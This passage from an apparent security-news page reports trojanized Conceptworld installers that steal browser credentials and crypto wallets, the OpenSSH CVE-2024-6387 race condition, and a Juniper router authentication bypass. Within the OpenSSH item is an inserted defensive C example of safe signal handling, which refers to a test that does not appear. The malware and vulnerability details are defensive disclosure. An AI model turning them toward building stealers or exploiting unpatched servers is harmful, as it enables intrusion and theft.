The installers correspond to Notezilla, RecentX, and Copywhiz, according to cybersecurity firm Rapid7, which discovered the supply chain compromise on June 18, 2024. The issue has since been remediated by Conceptworld as of June 24 within 12 hours of responsible disclosure.
"The installers had been trojanized to execute information-stealing malware that has the capability to download and execute additional payloads," the company said, adding the malicious versions had a larger file size than their legitimate counterparts.
Specifically, the malware is equipped to steal browser credentials and cryptocurrency wallet information, log clipboard contents and keystrokes, and download and execute additional payloads on infected Windows hosts. It also sets up persistence using a scheduled task to execute the main payload every three hours.
It's currently not clear how the official domain "conceptworld[.]com" was breached to stage the counterfeit installers. However, once installed, the user is prompted to proceed with the installation process associated with the actual software, while it's also designed to drop and execute a binary "dllCrt32.exe" that's responsible for running a batch script "dllCrt.bat."
Besides establishing persistence on the machine, it's configured to execute another file ("dllBus32.exe"), which, in turn, establishes connections with a command-and-control (C2) server and incorporates functionality to steal sensitive data as well as retrieve and run more payloads.
This includes gathering credentials and other information from Google Chrome, Mozilla Firefox, and multiple cryptocurrency wallets (e.g., Atomic, Coinomi, Electrum, Exodus, and Guarda). It's also capable of harvesting files matching a specific set of extensions (.txt, .doc, .png, and .jpg), logging keystrokes, and grabbing clipboard contents.
"The malicious installers observed in this case are unsigned and have a file size that is inconsistent with copies of the legitimate installer," Rapid7 said.
Users who have downloaded an installer for Notezilla, RecentX, or Copywhiz in June 2024 are recommended to examine their systems for signs of compromise and take appropriate action – such as re-imaging the affected ones – to undo the nefarious modifications.
New OpenSSH Vulnerability Could Lead to RCE as Root on Linux Systems
1.7.24
Vulnerability
The Hacker News
OpenSSH maintainers have released security updates to contain a critical
security flaw that could result in unauthenticated remote code execution with
root privileges in glibc-based Linux systems.
The vulnerability has been assigned the CVE identifier CVE-2024-6387. It resides in the OpenSSH server component, also known as sshd, which is designed to listen for connections from any of the client applications.
"The vulnerability, which is a signal handler race condition in OpenSSH's server (sshd), allows unauthenticated remote code execution (RCE) as root on glibc-based Linux systems," Bharat Jogi, senior director of the threat research unit at Qualys, said in a disclosure published today. "This race condition affects sshd in its default configuration."
The cybersecurity firm said it identified no less than 14 million potentially vulnerable OpenSSH server instances exposed to the internet, adding it's a regression of an already patched 18-year-old flaw tracked as CVE-2006-5051, with the problem reinstated in October 2020 as part of OpenSSH version 8.5p1.
"Successful exploitation has been demonstrated on 32-bit Linux/glibc systems with [address space layout randomization]," OpenSSH said in an advisory. "Under lab conditions, the attack requires on average 6-8 hours of continuous connections up to the maximum the server will accept."
The vulnerability impacts versions between 8.5p1 and 9.7p1. Versions prior to 4.4p1 are also vulnerable to the race condition bug unless they are patched for CVE-2006-5051 and CVE-2008-4109. It's worth noting that OpenBSD systems are unaffected as they include a security mechanism that blocks the flaw.
Specifically, Qualys found that if a client does not authenticate within 120 seconds (a setting defined by LoginGraceTime), then sshd's SIGALRM handler is called asynchronously in a manner that's not async-signal-safe.
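The phrase "not async-signal-safe" is the crux of the Qualys finding, and the defensive pattern that avoids it is short enough to show in full. The following C program is an added illustration, not OpenSSH's code: it models a server's login-grace timer with the unsafe handler shape left as a comment (a handler that logs, frees and exits on its own) and the safe shape implemented (the handler sets a flag of type volatile sig_atomic_t, and all teardown runs afterwards in ordinary program context). The names wait_for_login and cleanup_connection, and the use of raise() in place of a real alarm() so the example completes instantly, are assumptions made for this example.

```c
#define _POSIX_C_SOURCE 200809L
#include <signal.h>
#include <stdio.h>
#include <string.h>

/* Shared between the SIGALRM handler and the main program. volatile
 * sig_atomic_t is the one object type C guarantees can be written inside a
 * handler and read outside it without a data race. */
static volatile sig_atomic_t grace_expired = 0;

/* Counts cleanup work performed outside the handler (for the demonstration). */
static int cleanups_done = 0;

/*
 * UNSAFE shape, the pattern behind the race the page describes, shown only as
 * a comment so it is never compiled in. The handler does real work and calls
 * functions that are not async-signal-safe; if SIGALRM arrives while the main
 * program is inside malloc() or the logging library, the handler re-enters
 * them on half-updated internal state.
 *
 *   static void on_alarm_unsafe(int signo) {
 *       syslog(LOG_INFO, "login grace time expired");  // not async-signal-safe
 *       free_session_state();                           // free() in a handler
 *       exit(1);                                        // runs atexit handlers
 *   }
 */

/* SAFE shape: the handler only records that the deadline passed. */
static void on_alarm_safe(int signo)
{
    (void)signo;
    grace_expired = 1;
}

/* sigaction() rather than signal(): portable semantics, no handler reset. */
int install_grace_handler(void)
{
    struct sigaction sa;
    memset(&sa, 0, sizeof sa);
    sa.sa_handler = on_alarm_safe;
    sigemptyset(&sa.sa_mask);
    sa.sa_flags = 0;
    return sigaction(SIGALRM, &sa, NULL);
}

/* All real teardown runs here, in ordinary program context, where calling
 * the logger, free() and exit() is fine. */
static void cleanup_connection(void)
{
    cleanups_done++;   /* stand-in for logging and releasing session state */
}

/*
 * Simulated login wait. A real daemon would call alarm(grace_seconds) and
 * block in read(); here the signal is raised directly so the example runs
 * instantly. In a single-threaded program raise() returns only after the
 * handler has executed, so the flag is already visible afterwards.
 * Returns 1 when the grace timer fired, 0 if the client authenticated in
 * time, -1 if the handler could not be installed.
 */
int wait_for_login(unsigned grace_seconds)
{
    (void)grace_seconds;             /* would be alarm(grace_seconds) */
    grace_expired = 0;
    if (install_grace_handler() != 0)
        return -1;
    raise(SIGALRM);                  /* stands in for the timer expiring */
    if (grace_expired) {
        cleanup_connection();        /* safe: we are not inside the handler */
        return 1;
    }
    return 0;
}

int cleanups_performed(void)
{
    return cleanups_done;
}

int main(void)
{
    int rc = wait_for_login(120);    /* 120 s mirrors the default LoginGraceTime */
    printf("grace timer fired: %d, cleanups done outside the handler: %d\n",
           rc, cleanups_performed());
    return rc == 1 ? 0 : 1;
}
```

The design rule the example encodes is the one a code reviewer applies to any daemon: a handler may touch a sig_atomic_t flag and call the functions POSIX lists as async-signal-safe, and nothing else; every other action is deferred to the place where the main program notices the flag. A regression of the kind described here is exactly a handler that grew back a call it was once stripped of, which is why the test below checks that the cleanup count only advances from program context.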
The net effect of exploiting CVE-2024-6387 is full system compromise and takeover, enabling threat actors to execute arbitrary code with the highest privileges, subvert security mechanisms, steal data, and even maintain persistent access.
"A flaw, once fixed, has reappeared in a subsequent software release, typically due to changes or updates that inadvertently reintroduce the issue," Jogi said. "This incident highlights the crucial role of thorough regression testing to prevent the reintroduction of known vulnerabilities into the environment."
While the vulnerability has significant roadblocks due to its remote race condition nature, users are recommended to apply the latest patches to secure against potential threats. It's also advised to limit SSH access through network-based controls and enforce network segmentation to restrict unauthorized access and lateral movement.
Juniper Networks Releases Critical Security Update for Routers
1.7.24
Vulnerability
The Hacker News
Juniper Networks has released out-of-band security updates to address a critical
security flaw that could lead to an authentication bypass in some of its
routers.
The vulnerability, tracked as CVE-2024-2973, carries a CVSS score of 10.0, indicating maximum severity.
"An Authentication Bypass Using an Alternate Path or Channel vulnerability in Juniper Networks Session Smart Router or Conductor running with a redundant peer allows a network based attacker to bypass authentication and take full control of the device," the company said in an advisory issued last week.
According to Juniper Networks, the shortcoming affects only those routers or conductors that are running in high-availability redundant configurations. The impacted devices are listed below -
Session Smart Router (all versions before 5.6.15, from 6.0 before 6.1.9-lts, and from 6.2 before 6.2.5-sts)
Session Smart Conductor (all versions before 5.6.15, from 6.0 before 6.1.9-lts, and from 6.2 before 6.2.5-sts)
WAN Assurance Router (6.0 versions before 6.1.9-lts and 6.2 versions before 6.2.5-sts)
The networking equipment maker, which was bought out by Hewlett Packard
Enterprise (HPE) for approximately $14 billion earlier this year, said it found
no evidence of active exploitation of the flaw in the wild.
It also said that it discovered the vulnerability during internal product testing and that there are no workarounds that resolve the issue.
"This vulnerability has been patched automatically on affected devices for MIST managed WAN Assurance routers connected to the Mist Cloud," it further noted. "It is important to note that the fix is applied automatically on managed routers by a Conductor or on WAN assurance routers has no impact on data-plane functions of the router."
In January 2024, the company also rolled out fixes for a critical vulnerability in the same products (CVE-2024-21591, CVSS score: 9.8) that could enable an attacker to cause a denial-of-service (DoS) or remote code execution and obtain root privileges on the devices.
With multiple security flaws affecting the company's SRX firewalls and EX switches weaponized by threat actors last year, it's essential that users apply the patches to protect against potential threats.